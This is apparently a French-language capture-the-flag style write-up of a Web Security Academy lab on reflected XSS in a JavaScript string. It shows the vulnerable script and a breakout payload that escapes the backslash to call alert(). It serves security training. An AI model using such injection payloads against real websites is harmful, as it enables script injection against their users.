XSS dans une chaîne JS — chevrons encodés, guillemets doubles encodés et apostrophe échappée

Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped

Lab: Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped | Web Security AcademyWebSecAcademy

Ce laboratoire contient une vulnérabilité XSS réfléchi : la valeur de recherche est insérée dans une chaîne JavaScript. Les chevrons </> et les guillemets doubles sont HTML-encodés, et les apostrophes simples sont échappées. L’objectif : sortir de la chaîne JavaScript et appeler alert().

Extrait du script observé

var searchTerms = '&lt;/h1&gt;\'';
    document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');

Contraintes observées

L’apostrophe simple est échappée (\').

test'

Payload fourni

test\'+alert(0);//

Mis à jour il y a 4 mois

hashtagReflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped

Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped